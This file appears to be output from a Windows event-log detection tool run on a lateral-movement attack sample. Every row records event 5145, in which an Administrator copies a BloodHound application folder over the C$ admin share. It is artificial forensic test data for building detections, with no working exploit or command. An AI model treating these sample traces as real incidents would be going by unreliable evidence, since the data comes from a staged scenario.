+2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\example  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-stream  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\conf  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\build  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\client  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\core  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es5  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es6  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es7  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\array  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\date  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\dom-collections  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\error  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\function  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\json  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\map  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\math  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\number  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\object  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\promise  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\reflect  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\regexp  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\set  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\string  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\symbol  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\system  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\typed  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-map  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-set  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\core  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es5  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es6  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es7  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\fn  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\modules  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\stage  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\web  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules\library  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\stage  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\web  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\types  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\data  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\order  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\position  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\rank  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules\lodash  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
